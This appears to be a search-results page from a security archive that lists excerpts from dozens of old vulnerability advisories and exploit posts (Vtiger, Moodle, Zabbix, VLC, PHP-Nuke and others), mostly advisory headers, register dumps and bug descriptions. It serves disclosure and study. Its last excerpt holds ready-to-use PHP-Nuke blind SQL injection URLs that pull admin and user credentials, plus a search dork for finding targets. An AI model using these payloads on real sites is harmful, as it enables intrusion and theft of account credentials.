
ASCII value

Vtiger CRM 5.0.4 Multiple Vulnerabilities

 Vendor            http://www.vtigercrm.com
 Advisory          http://www.ush.it/team/ush/hack-vtigercrm_504/vtigercrm_504.txt
 Authors           Giovanni "evilaliv3" Pellerano (evilaliv3 AT ush DOT it)
                   Antonio "s4tan" Parata (s4tan AT ush DOT it)
                   Francesco "ascii" Ongaro (ascii AT ush DOT it)
 Date              20090818

I. BACKGROUND

Vtiger CRM is a free, full-featured, 100% Open Source CRM software ideal

PHP filesystem attack vectors - Take Two

 Systems Affected  PHP and PHP+Suhosin
 Vendor            http://www.php.net/
 Advisory          http://www.ush.it/team/ush/hack-phpfs/phpfs_mad_2.txt
 Authors           Giovanni "evilaliv3" Pellerano (evilaliv3 AT ush DOT it)
                   Antonio "s4tan" Parata (s4tan AT ush DOT it)
                   Francesco "ascii" Ongaro (ascii AT ush DOT it)
                   Alessandro "jekil" Tanasi (alessandro AT tanasi DOT it)
 Date              20090725

I)    Introduction
II)   PHP arbitrary Local File Inclusion testing

FormMail 1.92 Multiple Vulnerabilities

 Systems Affected  FormMail 1.92 and possibly earlier versions
 Severity          Medium
 Impact (CVSSv2)   Medium 4.3/10, vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)
 Vendor            http://www.scriptarchive.com/formmail.html
 Advisory          http://www.ush.it/team/ush/hack-formmail_192/adv.txt
 Authors           Francesco "ascii" Ongaro (ascii AT ush DOT it)
                   Giovanni "evilaliv3" Pellerano (evilaliv3 AT ush DOT it)
                   Antonio "s4tan" Parata (s4tan AT ush DOT it)
 Date              20090511

I. BACKGROUND

Nginx, Varnish, Cherokee, thttpd, mini-httpd, WEBrick, Orion, AOLserver, Yaws and Boa log escape sequence injection

                   http://yaws.hyber.org/
                   http://www.boa.org/
 Advisory          http://www.ush.it/team/ush/hack_httpd_escape/adv.txt
 Authors           Giovanni "evilaliv3" Pellerano (evilaliv3 AT ush DOT it)
                   Alessandro "jekil" Tanasi (alessandro AT tanasi DOT it)
                   Francesco "ascii" Ongaro (ascii AT ush DOT it)
 Date              20100110

I. BACKGROUND

nginx is a HTTP and reverse proxy server written by Igor Sysoev.

Moodle 1.9.3 Remote Code Execution

Severity          High
Impact (CVSSv2)   High 7.3/10, vector: (AV:N/AC:L/Au:M/C:P/I:P/A:C)
Vendor            http://moodle.org/
Advisory          http://www.ush.it/team/ush/hack-moodle193/moodle193.txt
Authors           Antonio "s4tan" Parata (s4tan AT ush DOT it)
                  Francesco "ascii" Ongaro (ascii AT ush DOT it)
                  Giovanni "evilaliv3" Pellerano (evilaliv3 AT
                  digitalbullets DOT org)
Date              20081212

I. BACKGROUND

WiKID wClient-PHP <= 3.0-2 Multiple XSS Vulnerabilities

  Systems Affected  wClient-PHP 3.0-2 and earlier versions
  Severity          Medium
  Impact (CVSSv2)   Medium (5/10, vector: AV:N/AC:L/Au:N/C:C/I:N/A:N)
  Vendor            http://www.wikidsystems.com/
  Advisory          http://www.ush.it/team/ush/hack-wclient/wikid.txt
  Author            Francesco "ascii" Ongaro (ascii AT ush DOT it)
                    Antonio "s4tan" Parata (s4tan AT ush DOT it)
  Date              20080411

I. BACKGROUND


Collabtive 0.4.8 Multiple Vulnerabilities

 Severity          High
 Impact (CVSSv2)   High 8/10, vector: (AV:N/AC:L/Au:S/C:P/I:C/A:P)
 Vendor            http://collabtive.o-dyn.de/
 Advisory          http://www.ush.it/team/ush/hack-collabtive048/adv.txt
 Authors           Antonio "s4tan" Parata (s4tan AT ush DOT it)
                   Francesco "ascii" Ongaro (ascii AT ush DOT it)
                   Giovanni "evilaliv3" Pellerano (evilaliv3 AT
                   digitalbullets DOT org)
 Date              20080925

I. BACKGROUND

Zabbix 1.6.2 Frontend Multiple Vulnerabilities

 Severity          High
 Impact (CVSSv2)   High 9.7/10, vector: (AV:N/AC:L/Au:N/C:P/I:C/A:C)
 Vendor            http://www.zabbix.com/
 Advisory          http://www.ush.it/team/ush/hack-zabbix_162/adv.txt
 Authors           Antonio "s4tan" Parata (s4tan AT ush DOT it)
                   Francesco "ascii" Ongaro (ascii AT ush DOT it)
                   Giovanni "evilaliv3" Pellerano (evilaliv3 AT
                   digitalbullets DOT org)
 Date              20090303

I. BACKGROUND

Jetty 6.x and 7.x Multiple Vulnerabilities

 Systems Affected  Jetty 7.0.0 and earlier versions
 Severity          Medium
 Impact (CVSSv2)   Medium 5/10, vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N)
 Vendor            http://www.mortbay.org/jetty/
 Advisory          http://www.ush.it/team/ush/hack-jetty6x7x/jetty-adv.txt
 Authors           Francesco "ascii" Ongaro (ascii AT ush DOT it)
                   Giovanni "evilaliv3" Pellerano (evilaliv3 AT ush DOT it)
                   Antonio "s4tan" Parata (s4tan AT ush DOT it)
 Date              20091024

I. BACKGROUND

PHP filesystem attack vectors

 Name              PHP filesystem attack vectors
 Systems Affected  PHP and PHP+Suhosin
 Vendor            http://www.php.net/
 Advisory          http://www.ush.it/team/ush/hack-phpfs/phpfs_mad.txt
 Authors           Francesco "ascii" Ongaro (ascii AT ush DOT it)
                   Giovanni "evilaliv3" Pellerano (giovanni.pellerano AT
                   evilaliv3 DOT org)
 Date              20090207

I)    Introduction

Re: [Full-disclosure] Zabbix 1.6.2 Frontend Multiple Vulnerabilities

>  Severity          High
>  Impact (CVSSv2)   High 9.7/10, vector: (AV:N/AC:L/Au:N/C:P/I:C/A:C)
>  Vendor            http://www.zabbix.com/
>  Advisory          http://www.ush.it/team/ush/hack-zabbix_162/adv.txt
>  Authors           Antonio "s4tan" Parata (s4tan AT ush DOT it)
>                    Francesco "ascii" Ongaro (ascii AT ush DOT it)
>                    Giovanni "evilaliv3" Pellerano (evilaliv3 AT
>                    digitalbullets DOT org)
>  Date              20090303
>
> I. BACKGROUND

SugarCRM 5.2.0e Remote Code Execution

 Severity          High
 Impact (CVSSv2)   High 8/10, vector: (AV:N/AC:L/Au:S/C:P/I:C/A:P)
 Vendor            http://www.sugarcrm.com
 Advisory          http://www.ush.it/team/ush/hack-sugarcrm_520e/adv.txt
 Authors           Antonio "s4tan" Parata (s4tan AT ush DOT it)
                   Francesco "ascii" Ongaro (ascii AT ush DOT it)
                   Giovanni "evilaliv3" Pellerano (evilaliv3 AT ush DOT it)
 Date              20090613

I. BACKGROUND


Mantis Bug Tracker 1.1.1 Multiple Vulnerabilities

  Severity          High
  Impact (CVSSv2)   High 9/10, vector: (AV:N/AC:L/Au:N/C:C/I:P/A:P)
  Vendor            http://www.mantisbt.org/
  Advisory          http://www.ush.it/team/ush/hack-mantis111/adv.txt
  Authors           Antonio "s4tan" Parata (s4tan AT ush DOT it)
                    Francesco "ascii" Ongaro (ascii AT ush DOT it)
  Date              20080520

I. BACKGROUND

 From the Mantis web site: "Mantis is a free popular web-based

VLC Player M3U file ftp:// URI Handler Remote Stack Buffer Overflow

When we open the malicious file our EDX and EBP registers point to the user-supplied data, which might lead to code execution.
The state of the registers when we open the malicious file is:

EAX 00000000
ECX 7008A2B7 ASCII ";type="
EDX 01DC743B ASCII "
ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
EBX 01C8C120
ESP 0324FB78
EBP 01D19008 ASCII "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD

Cacti 0.8.7a Multiple Vulnerabilities

 Systems Affected  Cacti 0.8.7a and possibly earlier versions
 Severity          High
 Impact (CVSSv2)   High (9/10, vector: AV:N/AC:L/Au:N/C:C/I:P/A:P)
 Vendor            http://www.cacti.net/
 Advisory          http://www.ush.it/team/ush/hack-cacti087a/cacti.txt
 Author            Francesco "ascii" Ongaro (ascii AT ush DOT it)
                   Antonio "s4tan" Parata (s4tan AT ush DOT it)
 Date              20071218

I. BACKGROUND


Publique! CMS SQL Injection Vulnerabilities

 the specific condition is satisfied. By monitoring the response time, it is
 possible to know if the conditional expression is True or False.

 Using this technique, it is possible to extract the usernames and passwords
 needed to authenticate into the Publique! management interface. Database
 information can be retrieved by testing the ASCII value of each character
 returned by the injected query.

 For example, the following payload may be used to extract the ASCII value of
 the first character returned by the query:


[securityreason] *BSD libc (strfmon) Multiple vulnerabilities

{
        va_list         ap;
        char            *dst;           /* output destination pointer */
        const char      *fmt;           /* current format position pointer */
        struct lconv    *lc;            /* pointer to lconv structure */
        char            *asciivalue;    /* formatted double pointer */

        int             flags;          /* formatting options */
        int             pad_char;       /* padding character */
        int             pad_size;       /* pad size */
        int             width;          /* field width */

Unexploitable buffer-overflow in the logging function of the Unreal engine

  appSprintf(unicode_buffer, "%s: %s%s", "Log", message, "\r\n");

the appSprintf function works exactly like snprintf, truncating the buffer
automatically at 1024 unicode chars without adding the final NULL byte
at the end if this limit is reached.
Then the unicode_buffer is converted into an ascii string using a set of
instructions similar to the following:

    /* copy until the first zero code unit; there is no terminator if the
       1024-char limit was hit, so the loop can run past the buffer */
    for(i = 0; (cx = unicode_buffer[i]); i++) {
        if(cx >= 256) cx = 0x7f;    /* non-Latin-1 code points become DEL */
        ascii_buffer[i] = cx;
    }

iDefense Security Advisory 08.15.07: ESRI ArcSDE Numeric Literal Buffer Overflow Vulnerability

Environmental Systems Research Institute (ESRI) Inc.'s ArcSDE service
allows attackers to crash the service or potentially execute arbitrary
code.

This vulnerability specifically exists due to insufficient buffer space
when representing user-supplied numeric values in ASCII. Certain
requests result in an sprintf() call using a static-sized 8 byte stack
buffer. If an attacker supplies a number whose ASCII value cannot be
represented within 8 bytes, a stack-based buffer overflow occurs.

III. ANALYSIS

Original Photo Gallery Remote Command Execution

 Name              Original Photo Gallery Remote Command Execution
 Systems Affected  Original 0.11.2 version and below
 Severity          High
 Vendor            http://jimmac.musichall.cz/original.php
 Advisory          http://www.ush.it/team/ascii/hack-original/advisory_updated.txt
                   http://www.ush.it/team/ascii/hack-original/advisory.txt
 Author            Francesco `ascii` Ongaro, Antonio `s4tan` Parata
 Date              20070919

I. BACKGROUND

[ISecAuditors Security Advisories] Cisco ASA <= 8.x VPN SSL module Clientless URL-list control bypass

-------------------------
Cisco VPN SSL Clientless lets administrators define rules to specific
targets within the private network that WebVPN users will be able to
access. These specific targets are published using links in the VPN SSL
home page. These links (URLs) are protected (obfuscated) using a ROT13
substitution[2] and converting ASCII characters to hexadecimal. A
user with a valid account and without "URL entry" can access any
internal/external resource simply by taking a URL, encrypting it with ROT13,
converting the ASCII characters to hexadecimal and appending this string to the
Cisco VPN SSL URL.


CORE-2010-0514: XnView MBM Processing Heap Overflow

ECX 7A7A7A7A
EDX 00000000
EBX 00000003
ESP 0171ED64
EBP 0171EEFC
ESI 013579F0 ASCII "zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz"
EDI 00C60000
EIP 77FCC453 ntdll.77FCC453
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)

Total video player 1.3.7 local buffer overflow universal exploit

greetz to : Allah , mr.5rab , Sup3r crystal , Hack Back , Al Alame , all arab4services.net and friends
bahjawi danger khod nasi7a

EAX 0034F928 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ECX 00004141
EDX 00340608
EBX 41414141
ESP 0012BF44
EBP 0012C160

CORE-2009-0122: HP OpenView Buffer Overflows

made to 'sprintf_new' with a destination buffer located in the heap that
is too small to hold the written string.

/-----------

0012724C  00392F98  ASCII "OvAcceptLang"
00127250  006C4BD0  ASCII "en-usaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"...

Call stack of main thread
Address    Stack      Procedure / arguments                 Called from

ZoneAlarm Security Suite buffer overflow

Strings


ASCII: · …  AAAAAAAAAAAAAAAAAAA · …  AAAAAAAAAAAAAAAAAAA · …  AAAAAAAAAAAAAAAAAAA · · …  AAAAAAAAAAAAAAAAAAA · …  AAAAAAAAAAAAAAAAAAA · …  AAAAAAAAAAAAAAAAAAA · · …  A · …  AAAAAAAAAAAAAAAAAAA · …  AAAAAAAAAAAAAAAAAAA

HEX : b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 b7 20 85 20 20 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41


ASCII: ……………………………AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA…………AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

RE: CheckPoint Secure Platform Multiple Buffer Overflows

Summarizing, the system protections are:

- Non executable stack/heap,...
- Random stack/heap base address
- ASLR (Address Space Layout Randomization)
- ASCII Armor (libraries mapped under 16MB, so null byte in its address)
- CPSHELL - a hardened shell that only allows running specific commands and a
very restricted sub-range of ASCII chars.

Even if we are not reinventing the wheel, I honestly think that the
exploitation scenario is far from "comfortable"... At the end a P.o.C.

[GOODFELLAS-VULN] FileFind class from MFC Library cause heap overflow

The FindFile method allocates memory for the buffer[1].
The buffer is then used to store the contents of the first argument of
the function[2] without checking if the argument actually fits in the
allocated buffer. This data is in turn used to start a search.

Both the unicode and ascii versions of the library use a very similar
function and have the same bug; the only real difference is the size
of the allocated buffer. The unicode version allocates 592 bytes and
the ascii version 320 bytes.



[CORELAN-10-015] - Remote Help 0.0.7 Httpd DoS (Format String)

EAX 41424344
ECX 00E7F818
EDX 00000000
EBX 0000006E
ESP 00D3F2FC ASCII "0000000000000..."
EBP 00D3F550
ESI 00000001
EDI 00D3FE27 ASCII "XDCBA>"
EIP 00414DFC httpd_0_.00414DFC


Sun IDM Arbitrary Commands Execution Vulnerability

manipulate account databases on the target resources. In the case of
*NIX-based systems the management server remotely logs in to a target
server and issues a series of shell commands, using a send-expect technique.

The system allows users to submit passwords containing control
characters including new line (ASCII 0x0A). The implementation of the
send-expect mechanism fails to handle such passwords correctly. This
flaw allows an unprivileged Sun IDM user to execute an arbitrary UNIX
shell command by requesting a password to be changed to a specially
crafted value. The injected command will be executed with root
privileges on all UNIX systems the user is provisioned on.

PHP-Nuke 8.0 Downloads Blind Sql Injection

#Dork : inurl:modules.php?name=Downloads "PHP-Nuke"                                 #
#                                                                                   #
#####################################################################################
#                                      [Bug]                                        #
#                                                                                   #
#Admin Username : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker@devil.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+aid+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F*
#Admin Password : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker@devil.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+pwd+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F*
#Users Username : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker@devil.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+username+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F*
#Users Password : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker@devil.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+user_password+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F*
#                                                                                   #
#####################################################################################
